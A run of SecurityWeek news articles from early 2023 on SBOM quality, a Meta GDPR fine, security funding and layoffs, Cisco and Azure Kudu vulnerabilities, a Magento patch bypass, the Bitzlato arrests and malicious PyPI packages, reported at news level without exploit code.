Software engineers tracking the quality of software bill of materials have stumbled on a startling discovery: Barely 1% of all SBOMs being generated today meets the “minimum elements” defined by the U.S. government.

According to new data from software supply chain security startup Chainguard, SBOMs being generated by existing tools fail to meet the minimum data fields needed inside an SBOM to enable the management of software vulnerabilities, licenses, and inventory tracking.

“Only one percent of SBOMs were entirely conformant with the minimum elements. The minimum elements appear to be a high bar for SBOMs. Further research will need to address whether the standard is too high, whether SBOM generation tools must evolve, or whether the underlying software artifacts lack necessary package metadata,” Chainguard security data scientist John Speed Meyers explained.

Chainguard’s researchers collected about 3,000 SBOMs for analysis using four SBOM creation tools from a list of popular Docker Hub containers and used an NTIA conformance checker tool to measure SBOM conformance with minimum elements.

The team said the minimum element data fields include information about each software component (supplier, name, version, unique ID, relationships) and also metadata about the SBOM itself, including the author and the time of creation.

After parsing the data, the Chainguard team found the majority of SBOMs lacked specified suppliers for their components while about 1,000 SBOMs failed to specify a name or version for all components.

The latest Chainguard discovery is sure to add fuel to an ongoing debate over the value and quality of SBOMs to help mitigate supply chain attacks. 

A high-powered lobbying outfit representing some of the biggest names in technology has already signaled strong objection to the government’s SBOM mandate, arguing that “it is premature and of limited utility” because SBOMs are not currently scalable or consumable. 

The ITI lobbying outfit, which counts Amazon, Microsoft, Apple, Intel, AMD, Lenovo, IBM, Cisco, Samsung, TSMC, Qualcomm, Zoom and Palo Alto Networks among its prominent members, described the current SBOM process as immature. 

“At this time, it is premature and of limited utility for software producers to provide an SBOM. We ask that OMB discourage agencies from requiring artifacts until there is a greater understanding of how they ought to be provided and until agencies are ready to consume the artifacts that they request,” the group said.

In its research, Chainguard called attention to the ITI objections, cautioning that its findings are not meant to be viewed as evidence for what it called a cynical argument that SBOMs are “immature” and not yet “consumable.” 

“This analysis suggests that standard SBOMs already provide a great deal of information but not enough to satisfy  the minimum elements. Additionally, this research implies that the push to make SBOMs “everywhere” should be accompanied by an effort to measure and improve the quality of SBOMs,” the company said.

A tool-by-tool analysis suggests that none of the tools appear to consistently create minimum elements-compliant SBOMs,” Chainguard added.

Still, the company is advising caution against dismissing the usefulness of SBOMs. “The results suggest lots of variability: some SBOMs are high-quality, some are low-quality,” it said.

The SBOM mandate was included in a cybersecurity executive order issued last May, sending security leaders scrambling to understand the ramifications and prepare for downstream side-effects.

Related: Big Tech Vendors Object to US Gov SBOM Mandate

Related: Microsoft Releases Open Source Toolkit for Generating SBOMs 

Related: Cybersecurity Leaders Scramble to Decipher SBOM Mandate

Ryan Naraine is Editor-at-Large at SecurityWeek and host of the popular Security Conversations podcast series.
Ryan is a veteran cybersecurity strategist who has built security engagement programs at major global brands, including Intel Corp., Bishop Fox and GReAT. He is a co-founder of Threatpost and the global SAS conference series. Ryan’s past career as a security journalist included bylines at major technology publications including Ziff Davis eWEEK, CBS Interactive’s ZDNet, PCMag and PC World.
Ryan is a director of the Security Tinkerers non-profit, an advisor to early-stage entrepreneurs, and a regular speaker at security conferences around the world.
Follow Ryan on Twitter @ryanaraine.

Previous Columns by Ryan Naraine:

Tags:

https://www.securityweek.com/chainguard-trains-spotlight-sbom-quality-problem

Social media giant Meta has been fined an additional 5.5 million euros ($5.9 million) for violating EU data protection regulations with its instant messaging platform WhatsApp, Ireland’s regulator announced Thursday.

The penalty follows a far larger 390-million-euro fine for Meta’s Instagram and Facebook platforms two weeks ago after they were found to have flouted the same EU rules.

In its new decision, the Irish Data Protection Commission (DPC) found the group acted “in breach of its obligations in relation to transparency,” the watchdog said in a statement.

In addition, Meta relied on an incorrect legal basis “for its processing of personal data for the purposes of service improvement and security,” the DPC added, giving the group six months to comply.

{ Read: Has Facebook Sidestepped GDPR’s User Consent Requirements? }

The fine was imposed by the Irish regulator because Meta — along with other US tech firms — has its European headquarters in Dublin.

In response on Thursday, Meta said it was opposed to the DPC decision and would look to overturn it.

“We strongly believe that the way the service operates is both technically and legally compliant,” a WhatsApp spokesperson said.

“We disagree with the decision and we intend to appeal.”

The breaches are similar to those explained in the regulator’s action against Meta earlier in January.

But the earlier decision also accused the Meta platforms of breaking rules over the processing of personal data for the purpose of targeted advertising.

In that instance the company, co-founded by social media magnate Mark Zuckerberg, was given only three months to respond to comply with the Irish regulator.

Meta announced its intention to appeal the 4 January decision, adding the regulatory ruling did not prevent targeted or personalised advertising.

The DPC said its more recent fine was considerably less because of a 225 million euro fine imposed on WhatsApp for “for breaches of this and other transparency obligations over the same period of time”.

Thursday’s Whatsapp fine was also far lower because it did not relate to targeted advertising.

The Irish regulator had fined Meta 405 million euros in September for failures in handling the data of minors, and 265 million euros in November for not sufficiently protecting users’ data.

This latest round of fines follows the adoption of three binding decisions by the European Data Protection Board (EDPB), the EU’s data protection regulator, in early December.

The Vienna-based privacy group NOYB, which brought the three complaints against Meta in 2018, had accused the social media behemoth of reinterpreting consent as a civil law contract, which stopped users from refusing targeted advertising.

In reaction to Thursday’s news, NOYB criticised the “tiny” size of the latest fine — and slammed the DPC for ignoring how WhatsApp shares data within the group for advertising purposes.

“We are astonished how the DPC simply ignores the core of the case after a 4.5-year procedure,” said NOYB founder Max Schrems.

In October 2021, the Irish authority had proposed a draft decision that validated the legal basis used by the group and suggested a fine of up to 36 million euros for Facebook and up to 23 million euros for Instagram, over their lack of transparency.

France’s CNIL regulator and other European bodies disagreed with the draft sanction, which they considered to be far too low.

They asked the EDPB to judge the dispute with the EU data regulator deciding in their favour.

The EDPB has also asked the Irish regulator to investigate Meta’s use of personal data.

However in its statement the DPC pushed back saying the the EU body does not have the power to “direct an authority to engage in open-ended and speculative investigation”.

The regulator said it will seek to annul the EDPB’s request before the European Union’s Court of Justice.

© AFP 2022

Previous Columns by AFP:

Tags:

https://www.securityweek.com/meta-slapped-55-million-euro-fine-eu-data-breach

B2B payment security provider NsKnox this week announced that it has raised $17 million in a new funding round that brings the total raised by the company to $35.6 million.

The new investment round was led by new investors Link Ventures and Harel Insurance and Finance, with participation from previous investors Microsoft’s M12 and Viola Ventures. NsKnox founder and CEO Alon Cohen also participated.

Founded in 2016, the Israeli company helps enterprises prevent fraud and protect B2B transactions by securing outbound and inbound payments using proprietary technologies, including Cooperative Cyber Security (CCS) and Bank Account Certificate.

NsKnox says its solutions can identify and mitigate finance and ops infrastructure attacks, business email compromise (BEC), insider fraud, social engineering, and other types of fraud attacks.

The fintech security company also provides organizations with account validation through its PaymentKnox end-to-end payment security platform, to verify the identity of senders and receivers and prevent transaction manipulation.

NsKnox says it will use the new funds to expand its product portfolio to corporations and banks, and to scale its go-to-market infrastructure.

Related: SASE Company Netskope Raises $401 Million

Related: Cyber Insurance Analytics Firm CyberCube Raises $50 Million

Related: API Security Firm FireTail Raises $5 Million

Related: Snyk Raises $196.5 Million at $7.4 Billion Valuation

Ionut Arghire is an international correspondent for SecurityWeek.

Previous Columns by Ionut Arghire:

Tags:

https://www.securityweek.com/b2b-payment-security-firm-nsknox-raises-17-million

There is a problem with API security – it isn’t working very well, and it’s largely down to credential leakage. Most security professionals are confident in their own API credential management; but at the same time, most of the same professionals admit to having experienced a breach effected through compromised API credentials.

In a survey of more than 400 US-based professionals (more than 90% of whom were developers or security people), 53% claimed to have suffered an API breach, while 77% claimed their company was very or extremely effective in managing their tokens. Only 3% believed they are not effective in protecting the credentials – and yet API breaches continue to rise.

The cause of this apparent contradiction is probably threefold: a lack of visibility into existing APIs, the sheer volume of APIs that are in use, and the amount of time already being spent on managing the credentials for those APIs. The survey conducted by Corsha discovered that 64% of companies are managing more than 250 API credentials across their network (with 3% managing more than 1,000).

This volume, and the company effort, is reflected in the amount of time spent on protecting them. Eighty-six percent of the respondents spend up to 15 hours every week provisioning, managing, and dealing with API secrets. That is time taken away from app development – making API secrets a costly and expensive exercise that still doesn’t work. Corsha costed this on an average developer’s salary of about $120,000 per year: “That means each respondent could be spending up to $44,460 per year on secrets management.”

There would appear to be no way of preventing API credential leakage. Corsha sees them being leaked from code repositories, versioning control, CI build systems, test artifacts and cloud environments. This problem is only going to worsen. Cisco predicts there will be more than 500 million new digital applications in 2023. “More applications means that the army of machines requiring API access will only catapult,” notes the report.

Credential rotation is one of the best manual practices to keep API secrets secret. Today, 27% of the survey respondents reported (PDF) that they rotate their API secrets only once per quarter, and sometimes only once per year. The strain on existing resources in a difficult economy combined with a growing API usage will make credential leakage more widespread, and credential rotation more problematic.

“The heavy administrative workload and exceedingly manual processes for maintaining good security hygiene around secrets management create significant opportunities for error or oversight,” notes Scott Hopkins, COO at Corsha.

“Security and engineering teams are forced to divert their attention away from forward-facing engineering to focus on secrets management, yet their organizations remain vulnerable to attackers both through lateral attacks and leaked or compromised API secrets to gain illegitimate access to sensitive data,” adds Jared Elder, Chief Growth Officer Corsha. “Data is everything and the potential risk from data breaches associated with leaked API secrets is clearly high and growing.  Yet with an explosion of credentials to provision, rotate, and manage, the good guys find themselves constantly behind the eight ball.” 

Corsha’s own solution to the problem is to add MFA to credential usage. This has several advantages. Firstly, since most of the APIs are internal on company networks, MFA from machine to machines is a form of microsegmentation that conforms to the principles of a zero trust architecture. This limits lateral movement by adversaries already in the network.

Secondly, one-time MFA from machine to machine is immune to one of the most successful MFA attacks used against humans – MFA fatigue attacks.

Thirdly, and perhaps most attractively, it removes the problem of credential rotation. Even if credentials are lost, stolen, or leaked, they cannot be used by adversaries who are unable to get through the MFA.

“That’s the problem we’re solving,” Anusha Iyer, co-founder and CEO at Corsha, told SecurityWeek. “If you have MFA in place, you don’t have to worry about the frequent rotation, and the same extensive hygiene of these static credentials.” 

All the customer needs to do is place the Corsha proxy at a point where it can monitor the traffic. “We will see the traffic that is coming in with good credentials and good MFA tokens and allow it; and we’ll see the traffic that’s coming in with no MFA or bad MFA credentials and block it,” she added.

Bad credentials probably mean bad guys on the network – so Corsha’s solution increases both visibility and prevention. The core of the Corsha platform is a distributed ledger system. Corsha uses this as an out-of-band element in the generation and use of machine-to-machine MFA. “The process is analogous to Google Authenticator,” explained Iyer. “In one direction you’re keeping in sync with a seed on Google servers, while in the other direction you’re using that to check MFA credentials.”

Corsha was founded in 2018 by Anusha Iyer, and Chris Simkins. It is headquartered in Washington, DC. It raised $12 million in a Series A funding round led by Ten Eleven Ventures and Razor’s Edge Ventures, with participation from 1843 Capital in April 2022.

Other providers in the API Security space include, Cequence, 42Crunch, Traceable AI, Ghost Security, Pangea Cyber, Wib, FireTail, Salt Security.

Related: U.S. Postal Service API Flaw Exposes Data of 60 Million Customers

Related: Leaked Algolia API Keys Exposed Data of Millions of Users

Related: Leaked GitHub API Token Exposed Homebrew Software Repositories 

Related: The Next Big Cyberattack Vector: APIs

Kevin Townsend is a Senior Contributor at SecurityWeek. He has been writing about high tech issues since before the birth of Microsoft. For the last 15 years he has specialized in information security; and has had many thousands of articles published in dozens of different magazines – from The Times and the Financial Times to current and long-gone computer magazines.

Previous Columns by Kevin Townsend:

Tags:

https://www.securityweek.com/credential-leakage-fueling-rise-api-breaches

Cisco on Wednesday announced patches for a high-severity SQL injection vulnerability in Unified Communications Manager (CM) and Unified Communications Manager Session Management Edition (CM SME).

Designed as enterprise call and session management platforms, Cisco Unified CM and Unified CM SME ensure the interoperability of applications such as Webex, Jabber, and more, while also maintaining availability and security.

Tracked as CVE-2023-20010 (CVSS score of 8.1), the vulnerability exists because user input is improperly validated in the web-based management interface of the platforms. The bug allows a remote, authenticated attacker to launch an SQL injection attack on a vulnerable system.

“An attacker could exploit this vulnerability by authenticating to the application as a low-privileged user and sending crafted SQL queries to an affected system. A successful exploit could allow the attacker to read or modify any data on the underlying database or elevate their privileges,” Cisco notes in an advisory.

The security defect impacts Cisco Unified CM and Unified CM SME versions 11.5(1), 12.5(1), and 14, and was addressed in version 12.5(1)SU7 of the applications. A patch will also be included in version 14SU3, which is scheduled for March 2023.

On Wednesday, the tech giant also informed customers of a medium-severity URL filtering bypass vulnerability in AsyncOS software for Email Security Appliance (ESA). A remote, unauthenticated attacker could exploit the bug using crafted URLs.

This week, Cisco also announced patches for three medium severity bugs in Expressway Series and TelePresence Video Communication Server (VCS).

Impacting the API and web-based management interfaces of these products, the flaws could be exploited by an authenticated, remote attacker to write files or access sensitive data on a vulnerable device. All Expressway Series and TelePresence VCS releases prior to 14.0.7 are impacted.

Cisco says it is not aware of any of these vulnerabilities being exploited in the wild. Further information on the flaws can be found on Cisco’s product security page.

Related: Cisco Warns of Critical Vulnerability in EoL Small Business Routers

Related: Cisco Patches High-Severity Bugs in Email, Identity, Web Security Products

Related: Cisco Secure Email Gateway Filters Bypassed Due to Malware Scanner Issue

Ionut Arghire is an international correspondent for SecurityWeek.

Previous Columns by Ionut Arghire:

Tags:

https://www.securityweek.com/cisco-patches-high-severity-sql-injection-vulnerability-unified-cm

The owner of China-based cryptocurrency exchange Bitzlato was arrested in Miami on Wednesday, along with five associates in Europe, during an international operation against “darknet” markets.

Anatoly Legkodymov, 40, a Russian living in Shenzhen, China, appeared in handcuffs and leg shackles in a Miami courtroom on money laundering charges, and was denied bail by a judge who deemed him a flight risk.

He was detained for his role in allegedly transmitting a total of $700 million in illicit funds, the US Department of Justice charged, with officials saying that criminals used the exchange as a haven for narcotics trading and selling stolen financial information.

Five other men, mainly of Russian and Ukrainian nationalities, were arrested in Spain, Portugal and Cyprus, as part of a complex police swoop led by French authorities, officials in Paris said.

According to US court documents, Legkodymov is the founder and majority shareholder of Hong Kong-registered Bitzlato, which marketed itself as requiring minimal identification from users.

Bitzlato’s largest partner for transactions was Hydra, an anonymous, illicit online marketplace on the “darknet” that was shut down by US and German authorities last year.

The secret “darknet” includes websites that can be accessed only with specific software or authorizations, ensuring anonymity for users.

As the arrests were announced, authorities dismantled Bitzlato’s digital infrastructure, including its servers in France, and seized cryptocurrency worth $17 million.

Paris prosecutor Laure Beccuau said Bitzlato enabled cryptocurrencies including bitcoin and ethereum to be converted into Russian rubles.

‘Cryptocrime ecosystem’

US Deputy Attorney General Lisa Monaco welcomed “a significant blow to the cryptocrime ecosystem.”

“Overnight, the Department worked with key partners here and abroad to disrupt Bitzlato, the China-based money laundering engine that fueled a high-tech axis of cryptocrime, and to arrest its founder,” she said.

Monaco said that “today’s actions send the clear message: whether you break our laws from China or Europe — or abuse our financial system from a tropical island — you can expect to answer for your crimes.”

When it was closed in April 2022, the Hydra marketplace had around 17 million customer accounts and more than 19,000 vendor accounts, according to German federal police.

Such networks have faced increased pressure from international law enforcement after a boom in usage during the coronavirus pandemic.

“As alleged, Bitzlato sold itself to criminals as a no-questions-asked cryptocurrency exchange, and reaped hundreds of millions of dollars’ worth of deposits as a result,” said Breon Peace, Attorney for the Eastern District of New York.

“The defendant is now paying the price for the malign role that his company played in the cryptocurrency ecosystem.

“Bitzlato allegedly became a haven for criminal proceeds and funds intended for use in criminal activity.”

In May 2019, Legkodymov allegedly told a colleague on Bitzlato’s internal chat system that users were “known to be crooks” deploying others’ identity documents to register accounts.

In the Miami courtroom, Federal Judge Jacqueline Becerra told Legkodymov, dressed in a gray polo shirt and blue shorts, that he faces a possible five-year prison term. Legkodymov will return to court Friday for a hearing on his transfer to New York, where the charges were brought.

US officials are cracking down on the cryptocurrency sector after the uproar caused by the recent bankruptcy of FTX and Alameda Research.

FTX, once the world’s highest profile crypto exchange, collapsed spectacularly in November leaving nine million customers in the lurch and seeing cofounder Sam Bankman-Fried indicted for fraud by US prosecutors.

Related: Canadian Teen Arrested Over Theft of $36 Million in Cryptocurrency

Related: Justice Dept. Announces $3.6B Crypto Seizure, 2 Arrests

© AFP 2022

Previous Columns by AFP:

Tags:

https://www.securityweek.com/international-arrests-over-criminal-crypto-exchange

A cross-site request forgery (CSRF) vulnerability impacting the source control management (SCM) service Kudu could be exploited to achieve remote code execution (RCE) in multiple Azure services, cloud infrastructure security firm Ermetic has discovered.

A web-based Git repository manager, Kudu is the engine behind several Azure App Service features, supporting the deployment and management of code in Azure. The service is used by Functions, App Service, Logic Apps, and other Azure services.

Administrators can manage Azure applications from the SCM panel, which uses Kudu and which requires Azure Active Directory (AAD) authentication. The SCM panel is deployed by default by the App Service, Function Apps, and Logic Apps Azure services.

“If the user has authenticated to their Microsoft account through the browser, they can simply navigate to the SCM panel and log in. Otherwise, they need to log in manually with their Microsoft authorized credentials,” Ermetic notes.

The CSRF vulnerability in Kudu could be exploited to deploy a malicious ZIP file to the victim’s Azure application, which could result in code execution and application takeover. Ermetic calls the attack EmojiDeploy.

Successful exploitation of the security defect could allow an attacker to run code as the www user, steal or tamper with sensitive data, launch phishing campaigns, and even move laterally to other Azure services.

“The vulnerability enables RCE and full takeover of the target app. The impact of the vulnerability on the organization as a whole depends on the permissions of the applications managed identity. Effectively applying the principle of least privilege can significantly limit the blast radius,” Ermetic notes.

According to Ermetic, attackers targeting the vulnerability would need to exploit a same-site misconfiguration, to bypass an origin check, and then exploit a vulnerable endpoint, which would eventually lead to RCE.

Specifically, Ermetic discovered that the Same-Site attribute for the SCM panel’s cookie was set to “None”, meaning that no protection was being offered against cross-origin attacks, and that the SCM server would accept requests containing special characters, leading to cross-origin protections bypass.

“This finding allows an attacker to create a wildcard DNS record for his own domain and send cross-origin requests with special characters that eventually will be accepted by the server origin check,” Ermetic explains.

The researchers also discovered that, when processing requests to the ZIP ‘deploy to application’ feature available through the SCM, the server does not validate or require the headers sent by the client, which would bypass existing CSRF mitigations.

“After some investigation, the SCM Server in this particular zipdeploy endpoint accepts text/plain Mime-types. We can encode our zip payload and use text/plain for CSRF,” Ermetic notes.

The EmojiDeploy attack can be performed via a browser, but exploitation of the vulnerability requires for the attacker to have SCM or Microsoft account cookies in their browser.

The vulnerability was reported to Microsoft in October 2022 and the tech giant addressed it in December through stronger origin checks on the server and by changing the same-site cookie value to ‘Lax’. Microsoft awarded a $30,000 bug bounty for the issue.

Related: Azure Services SSRF Vulnerabilities Exposed Internal Endpoints, Sensitive Data

Related: Microsoft Patches Azure Cross-Tenant Data Access Flaw

Related: Microsoft Patches Vulnerability Allowing Full Access to Azure Service Fabric Clusters

Ionut Arghire is an international correspondent for SecurityWeek.

Previous Columns by Ionut Arghire:

Tags:

https://www.securityweek.com/csrf-vulnerability-kudu-scm-allowed-code-execution-azure-services

Sophos has confirmed reports that it’s laying off employees. The company joins several other major cybersecurity companies that have announced cutting staff over the past year.

The first reports of layoffs at Sophos came from India. The company confirmed to TechCrunch that 10% of its global employee base is impacted. While an exact number has not been shared, the news website learned that roughly 450 people — potentially from all roles — have lost their job.

Sophos, which private equity firm Thoma Bravo acquired in 2020 for $3.9 billion, blamed the layoffs on the global economic slowdown. The company says it wants to focus more on cybersecurity services, including managed detection and response.

“Sophos is taking these steps for two main reasons: first, to ensure that we achieve the optimal balance of growth and profitability to support Sophos’ long-term success, which is particularly important in the midst of a challenging and uncertain macro environment; and second, to allocate our investments across the company to support our strategic imperative to be a market leader in delivering cybersecurity as a service,” a Sophos spokesperson told TechCrunch.

Several major cybersecurity companies announced layoffs over the past year, including Lacework, OneTrust, and Cybereason.

Microsoft announced this week plans to eliminate 10,000 jobs, but it’s unclear if its security businesses units are impacted.

While major cybersecurity companies are announcing layoffs, many of those who have been terminated will likely not have any difficulties securing a job at a different company.

According to a recent study from nonprofit (ISC)², the global cybersecurity workforce is at an all-time high, with an estimated 4.7 million professionals.

However, (ISC)² estimates that an additional 3.4 million cybersecurity workers are needed, with 70% of the 11,000 professionals who took part in a survey conducted by the nonprofit saying that their organization does not have enough cybersecurity employees.

Related: How a VC Chooses Which Cybersecurity Startups to Fund in Challenging Times

Related: Predictions 2023: Big Tech’s Coming Security Shopping Spree

Related: Cybersecurity Workforce Study Needs to be Taken with a Pinch of Salt

Eduard Kovacs (@EduardKovacs) is a contributing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.

Previous Columns by Eduard Kovacs:

Tags:

https://www.securityweek.com/sophos-joins-list-cybersecurity-companies-cutting-staff

Vendors and agencies are actively bypassing the security patch that Adobe released in February 2022 to address CVE-2022-24086, a critical mail template vulnerability in Adobe Commerce and Magento stores, ecommerce security firm Sansec warns.

The CVE-2022-24086 bug (CVSS score of 9.8) is described as an improper input validation bug in the checkout process. It could be exploited to achieve arbitrary code execution, with in-the-wild exploitation observed roughly one week after patches were made available for it.

The initial fixes were found to be easily bypassed, and Adobe issued a second round of patches and a new CVE identifier (CVE-2022-24087) for the bug only days later. A proof-of-concept (PoC) exploit targeting the flaw was released around the same time.

To address the vulnerability, Adobe removed ‘smart’ mail templates and replaced the old mail template variable resolver with a new one, to prevent potential injection attacks.

However, the move caught many vendors off guard, and some of them “had to revert to the original functionality.” In doing so, they unknowingly exposed themselves to the critical vulnerability, despite having applied the latest security patch, Sansec explained.

The security firm has observed some vendors attempting to reintroduce the functionality of the deprecated resolver into production Magento stores, either by overriding the functionality of the new resolver, or by copying code from older versions of Magento and using it as a preference.

“We have observed this risky behavior at multiple agencies as well as extension vendors, likely to avoid the need to update their email templates to be compatible with the new [resolver],” Sansec added.

The company said some vendors attempted to mitigate security risks by adding to the ordering systems basic filtering on unsafe user inputs, but that does not prevent exploitation, given that the vulnerability can be triggered from other subsystems as well, if they touch email.

Related: Magento Vulnerability Increasingly Exploited to Hack Online Stores

Related: Malware Infects Magento-Powered Stores via FishPig Distribution Server

Related: CISA Urges Orgs to Patch Recent Chrome, Magento Zero-Days

Ionut Arghire is an international correspondent for SecurityWeek.

Previous Columns by Ionut Arghire:

Tags:

https://www.securityweek.com/vendors-actively-bypass-security-patch-year-old-magento-vulnerability

Fortinet warns of three new malicious PyPI packages containing code designed to fetch the Wacatac trojan and information stealer as a next stage payload.

The three Python packages, ‘colorslib’, ‘httpslib’ and ‘libhttps’ were uploaded to PyPI (Python Package Index) on January 7 and January 12.

All three packages were published by the same author from a user account named ‘Lolip0p’, which joined the repository shortly before the packages were published.

The Python packages feature legitimate-looking descriptions, meant to trick users into believing they are clean. However, Fortinet discovered that all versions of these packages are, in fact, malicious.

Each package, the cybersecurity firm says, contains the same setup.py script and attempt to run a PowerShell script to download an executable binary from an external link.

The download URL has not been flagged as malicious by any of the antivirus products on VirusTotal, but the downloaded file is detected as malicious by a few of them.

Named ‘Oxyz.exe’, the executable has been designed to download another binary, called ‘update.exe’, which is executed from the victim’s temp folder. The binary drops additional files in the same folder.

Both the binary and one of the executables it fetches (SearchProtocolHost.exe) are flagged by several antivirus tools as ‘Wacatac’, a trojan and information stealer that targets login credentials, banking information, and other sensitive information.

Wacatac can also be used to deploy additional malware on the victim’s machine, including ransomware, and perform other “actions of a malicious hacker’s choice”, according to Microsoft.

“Python end users should always perform due diligence before downloading and running any packages, especially from new authors. And as can be seen, publishing more than one package in a short time period is no indication that an author is reliable,” Fortinet concludes.

Related: PyPI Users Targeted With PoweRAT Malware

Related: Malicious PyPI Module Poses as SentinelOne SDK

Related: Python, JavaScript Developers Targeted With Fake Packages Delivering Ransomware

Related: Security Firms Find Over 20 Malicious PyPI Packages Designed for Data Theft

Ionut Arghire is an international correspondent for SecurityWeek.

Previous Columns by Ionut Arghire:

Tags:

https://www.securityweek.com/pypi-users-targeted-wacatac-trojan-new-supply-chain-attack